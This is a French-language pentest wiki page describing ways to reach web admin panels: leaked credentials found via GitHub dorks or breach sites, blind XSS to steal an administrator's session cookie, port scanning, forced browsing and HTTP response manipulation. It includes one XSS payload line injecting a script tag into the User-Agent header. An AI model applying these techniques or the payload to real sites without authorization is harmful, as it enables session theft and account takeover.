Pentest & Bug Bounty
  • 🥷Pentest et Bug Bounty
    • 👾Pentest Methodology
    • 💸Bug Bounty Methodology
      • 📓Ecrire un bon rapport
      • ⚖️Aspect Juridique (FR)
  • 👣OSINT / Recon
    • 🧦Sock Puppet
    • 🧠Mindmaps
    • 🏢Entreprise
    • 👀Leaks
    • 👊Manuel / Dorks
      • Google dorks
      • Github dorks
      • Twitter Dorks
      • Shodan Dorks
    • 👥Réseaux sociaux (SOCMINT)
      • 🕵️Telegram OSINT
      • 👻Snapchat OSINT
      • 🤵‍♂️Linkedin OSINT
      • 🗣️Facebook OSINT
      • 🎼Tik tok OSINT
      • 📷Instagram OSINT
      • 🐦Twitter OSINT
      • 🔊Discord OSINT
    • 🖇️Domaines et Sous-domaines
    • 🚪Scan de ports / web
    • ✉️Emails
    • 🔗Réseau
    • 📷Screenshots
    • 📹Live camera
    • 🧔Reconnaissance faciale / images
    • 🌆Images
    • 🗺️Maps
    • 👁️Active Directory
    • ☁️Cloud
    • Autre
  • 🌐Pentest Web
    • ✊Brute force / Fuzzing
    • 💉Injections
      • 🍪XSS
        • PDF injection
      • 📄HTMLi
      • 📃XXE
      • 7️⃣SSTI
      • 🔢SQLi
        • 👫UNION based
        • ⏳Time based
        • 🥽Boolean based / Error Based
        • 📤Out-Of-Band
      • ↩️CRLF
      • 🐚OS injection
      • ☕Log4Shell
      • 🥠CSV
      • 🍻ESI
      • 😎XSLT
      • 💌Injections dans emails
      • 🔀ELi
        • OGNLi
    • ↪️Open redirect
    • 📁Path Traversal / LFI / RFI
    • 🔓Bypass
      • 〰️WAF / Filter bypass
      • 2️2FA
    • ☠️Charges utiles
    • 📚CMS (Content Management System)
      • WordPress
      • Joomla!
      • Magento
      • Drupal
    • 🎭SOP bypass
      • CORS
      • postMessage()
      • JSONP
    • 🖱️Clickjacking
    • ⚙️Insecure deserialization
    • ☣️Web Cache Poisoning / Deception
    • 🤝HTTP Smuggling
    • 👋OAuth
    • ⛔SAML
    • 🗝️JSON Web Token
    • 🎣CSRF
      • 🚀Cross-site WebSocket Hijacking (CSWSH)
    • 🎯IDOR
    • 🕹️SSRF
      • Cloud SSRF
      • Protocol Smuggling
    • ⚙️APIs
      • 🍽️REST
      • 📶GraphQL
    • ❓Mot de passe oublié
    • 🛒Fonctions d'achat et de facturation
    • 👽Broken authentication / register
    • 🏁Panneaux d'administration
    • ⏬Upload features
    • 🔗Broken Link Hijacking
    • 🎮Prise de contrôle de sous-domaine
    • 🛂Prise de contrôle de DNS
    • ☝️One liners
    • 🚧Misconfigurations
    • 🗿Analyse statique
      • PHP
      • Ruby On Rails
      • Perl
      • JAVA
      • Javascript
      • Python
      • Golang
      • .NET
    • 🪣AWS S3
    • 🤖Captcha
    • 🪞Race conditions
    • ☄️.git exposé
    • 💭Business logic
    • 🥡Prototype pollution
    • 💣Dependency confusion
    • 🛑DoS
      • 🤯ReDoS
      • 👏Hash flooding
      • 🧨Cookie bomb
    • Autre
      • Flask
      • Symphony
      • Spring Boot
      • Django
      • Jenkins
  • 🌩️Pentest Cloud
    • IaC (Infrastructure as Code)
      • Terraform
      • Helm
      • Kustomize
    • AWS
      • Enumeration
    • Azure
      • Entra ID
      • Azure Resource Manager (ARM)
        • Enumeration
    • GCP
      • GCP IAM
      • Authentification
      • Enumeration
    • Kubernetes
  • 🕸️Pentest Réseau
    • 🪡Protocoles réseau
    • 📡Wifi
    • 🔋BLE
    • 📍VPN
  • 🗂️Pentest AD
    • 👺GPP
    • ➡️Mouvements latéraux
      • 🔪Pass The Hash
      • 🗡️Over Pass The Hash
    • 📜ADCS
  • 📱Pentest Mobile
    • 🤖Android
      • 👾Méthodologie
      • 🌳Setup environnement
      • 🍇Collecte d'informations
      • 🔠Enumeration des données locales
      • 🔙Reverse engineering
        • 🪢Dé-obfuscation
      • ⛰️Analyse statique (Android)
      • 🐞Debug
      • 🎰Stockage de données non sécurisé
        • 📰Logs
        • 🤝Shared Preferences
        • 🔤Strings
        • 🗄️SQLite DB
        • 🗃️Realm DB
        • 🧠Mémoire
        • 📍Copy/Paste buffer caching
        • ⌨️Keyboard press caching
        • 🔙Backup
        • Carte SD
      • 🌩️Firebase/Appspot misconfig
      • 🔗Deeplinks vulns
        • Interception de contenu
        • WebView hijacking (via deeplink)
        • Invalid Digital assets links
      • 🖼️WebView vulns
        • WebView Hijacking
        • Exfiltration de données
        • RXSS
        • Vol de token
      • Guides outils
        • ⛏️Outil Drozer
          • Injections SQL (Android)
          • Path traversal (Android)
        • 🔬Outil Objection
        • 🪝Outil Frida
        • Outil Medusa / Mango
      • Bypass
        • 📲Contournement de détection d'emulateur
          • 📂Fichiers d'emulateurs
          • 🙋‍♂️Network Operator Name
        • 🦷Contournement des détections de rootage
          • 🧮Root management
          • 🗝️Clé de signature du noyau
          • 🧊Props dangereux
          • 🦸‍♂️Binaire "su"
          • ❌Permissions sur les repertoires
        • ☝️Contournement des protections biometriques
        • 📜SSL pinning bypass
        • Contournement de code PIN
      • 🔳Lecteur de code QR/EAN/Barres...
      • 💔Injection de backdoor
      • 🪧Task hijacking
      • 🎭Overlay attacks
        • Tapjacking
        • Invisible Keyboard
      • 📵Résilience
        • ⌨️Third Party Keyboards
        • ©️Allowed Copy/Paste on sensitive fields
        • 🛤️Background screen caching
        • 🖋️Schémas de signature
        • ⬆️In-App updates
      • 🤯Corruption de Mémoire
    • 🍏iOS
      • 🥅Méthodologie
      • 🧱Setup environnement (iOS)
      • ⏮️Reverse engineering (iOS)
      • 🏔️Analyse statique (iOS)
      • 🧿Contournement de détection de Jailbreak
      • 📌SSL pinning bypass (iOS)
      • 👇Contournement d'authentification biométrique
      • 🐛Contournement d'anti-Hooking/Debugging
      • 🙈Stockage de données non sécurisé (iOS)
        • 💭Mémoire (iOS)
        • 🏓Copy/Paste buffer caching (iOS)
        • 🍪Cookies (iOS)
        • 🗞️Logs (iOS)
        • ⌨️Cache du clavier (IOS)
        • Backup (IOS)
      • 📱Background screen caching
      • 🧑‍🚀WebView vulns (iOS)
      • Deeplinks vulns (iOS)
      • Lecteur de code QR
      • Firebase misc
  • 👷Pentest physique
    • 🔐Crochetage
    • 💳RFID
    • ⚙️Equipements
    • 💾Hardware Hacking
      • 📈UART
      • 🧪JTAG
      • ⚡SWD
      • 🪢SPI
      • 🚌I²C
      • 🔴Fault Injection
      • Side-Channel Attacks
    • 🐣Firmware hacking
  • 🖨️Pentest IoT
    • ⏪Replay de stream camera
    • 🗣️Assistants vocaux
    • 📹Camera IP
    • ⬇️DoS
    • 🖨️Imprimantes
    • 🎬Chromecast
  • 💀Hacking protocols
    • 😩Telnet - port 23
    • 🔐SSH - port 22
    • 📤FTP - port 21
    • ❔Whois - port 43
    • 👉DNS - port 53
    • 🐕‍🦺Kerberos - port 88
    • 💼SNMP - ports 161-162
    • 📨SMB - ports 445-139
    • 📧SMTP - ports 25-587
    • 🎦RTSP - port 554
    • 🔎MS-RPC - ports 135-593
    • ➕Rsync - port 873
    • 🔢MS-SQL - port 1433
    • 🏗️Docker - port 2375
    • 🔡MySQL - port 3306
    • 📝LDAP - ports 389, 636, 3268, 3269
    • 🖥️RDP - port 3389
    • ⌨️VNC - ports 5800,5801,5900,5901
  • 😈Ingénierie sociale
    • 🧠Concepts / Principes / Attaques
    • 🪧Ethique
    • 👤Profils comportementaux
  • 🔓Crack
  • 🛠️Autres outils utiles
    • 🚿Sandbox / Sanitizer
    • 🔤Générateurs de wordlists personnalisées
  • 🌜Post-Exploitation
    • 👔Énumération /Élévation de privilèges
      • 🐧Linux
        • CVE-2022-0847 (Dirty Pipe)
        • CVE 2021-4034 (PwnKit)
        • CVE 2021-3560 (Polkit)
      • 🪟Windows
        • 🖨️PrintNightmare
        • 🖨️SpoolFool
        • 🆔Usurpation de SAMAccountName
        • ⏲️Scheduled task/job (T1573.005)
        • 🐝HiveNightmare
        • 🔑Stored Credentials
        • 🎩SeImpersonatePrivilege
        • 🎒SeBackupPrivilege
        • 🍞Unquoted Service Path
        • 🧩DLL Hijacking
        • ©️SeBackupPrivilege
      • ⛴️Docker
    • 👻Effacement des traces
    • ⚓Persistance / Downloaders
    • 🛡️Defense evasion
    • 📦Exfiltration de Données
  • 🔎Forensic
    • 💡Méthodologie
    • 📺Live forensic
    • 💻Mémoire non volatile
    • 🕊️Mémoire volatile
    • 📄File forensic
Propulsé par GitBook
Sur cette page
  • Passer par Github et Gitlab
  • Passer par une injection Blind XSS
  • Points d'injection:
  • Passer par des ports ouverts insoupçonnés
  • Passer par la falsification de requête et la navigation forcée
  • Passer par de l'analyse statique
  • Passer la manipulation de réponse

Cet article vous a-t-il été utile ?

  1. Pentest Web

Panneaux d'administration

PrécédentBroken authentication / registerSuivantUpload features

Dernière mise à jour il y a 2 ans

Cet article vous a-t-il été utile ?

Afin d'accéder à un panneau d'administration, plusieurs méthodes d'offrent à nous:

  1. Trouver des identifiants ou tokens dans un repo Github ou Gitlab.

  2. Trouver une injection blind XSS

  3. Passer par des ports ouverts potentiellement inconnus

  4. Passer par de la falsification de requête

  5. Trouver des identifiants ou tokens hardcodés dans le code source

  6. Manipuler la réponse HTTP

  7. Changer la méthode d'authentification

  8. Exploiter une mauvaise configuration

  9. Trouver des identifiants ayant fuités sur des sites tels que IntelX ou Dehashed

Passer par Github et Gitlab

Github et Gitlab possèdent des permettant de faire des recherches avancées sur leur moteur de recherche. Passer par ces dorks permet de ce fait de rechercher des mots clès et de cibler précisément la cible souhaitée.

Pour apprendre comment utiliser ces dorks, veuillez vous reporter à la section ci-dessous:*

Vous pourrez aussi retrouver des outils automatisées pouvant vous aider dans cette phase dans la section ci-dessous:

Passer par une injection Blind XSS

Passer par une blind XSS peut permettre notamment de voler le cookie de session de l'administrateur au moment où il consultera une ressource particulière telle que ces logs par exemple. Il est également courant dans les sites de vente en ligne notamment que les commentaires / feedback envoyés pour un produit doivent être validés par un administrateur ce qui en fait un point d'intérêt pour un attaquant souhaitant usurper la session d'un administrateur.

Points d'injection:

  • Formulaires de contact / feedback / commentaire

  • Sondage

  • Entrée de mot de passe

  • Chat / Forum

  • Application de ticketing

  • Description d'utilisateur

  • Nom d'utilisateur (puis reset de mot de passe)

  • Fonctionnalité "d'appel à un expert"

  • En-tête "User-Agent:" (Possibilité de Match & Replace de Burp Suite tel que Match=Votre user agent et Replace="><script src=lien vers xsshunter ou équivalent></script>)

Passer par des ports ouverts insoupçonnés

Faire l'inventaire des ports ouverts pour une cible données en comptant domaine et sous-domaines peut parfois permettre de mettre la main sur des interfaces de connexion potentiellement oubliés et vieillissants pouvant être très facilement contournés soit par l'usage d'identifiant par défauts ou par des identifiants hardcodés etc...

Les étapes à suivre sont donc les suivantes:

  1. Enumération de sous-domaines.

  2. Scan de ports de la liste des sous-domaines.

  3. Listage des interface de connexion.

  4. Tester des wordlists de mots de passes simples / par défaut sur les formulaire de connexion.

  5. Tenter de bypass l'authentification avec des SQLi, LDAP injection etc.

  6. Tenter de trouver des identifiants hardcodés dans le code source.

  7. Tenter de trouver des exploits pouvant vous permettre de passer au travers du mechanisme d'authentification.

Passer par la falsification de requête et la navigation forcée

Pour cela, on va dans un premier temps utiliser des outils tels que gobuster pour fuzz les repertoires du site cible et essayer d'accéder directement au répertoire souhaiter sans passer par celui s'occupant de l'authentification (Vulnérabilité présente notamment dans les sites très anciens).

Exemple:

On a une page de connexion à l'url "https://target.com/admin/" et on sait qu'il y a une nommée "control.php" à l'url "https://target.com/admin/dashboard/control.php" alors au lieu de passer par la première url on entre directement sur la page https://target.com/admin/dashboard/control.php.

Autre possibilité, falsifier la requête. Pour cela, il y a plusieurs façon de falsifier une requête et je vous invite à vous rendre dans la section ci-dessous pour en apprendre d'avantage:

Passer par de l'analyse statique

L'analyse du code source peut également parfois permettre de découvrir des vulnérabilités dans les mécanismes d'authentification et/ou de trouver parfois même des identifiants, tokens, secrets, endpoints etc pouvant permettre d'avoir comme finalité l'accès au panneau d'administration de la cible.

Pour découvrir l'analyse statique, veuillez vous reporter à la section du même nom:

Passer la manipulation de réponse

Changer la réponse HTTP de 403 à 200 peut dans certains cas permettre de faire croire au serveurs que nous avons le droit d'accéder au panneau d'administration alors même que nous ne nous somme pas authentifié.

Pour intercepter la réponse HTTP dans burp:

Proxy -> Options -> Intercept Server Responses

🌐
🏁
dorks
👊Manuel / Dorks
👀Leaks
🔓Bypass
🗿Analyse statique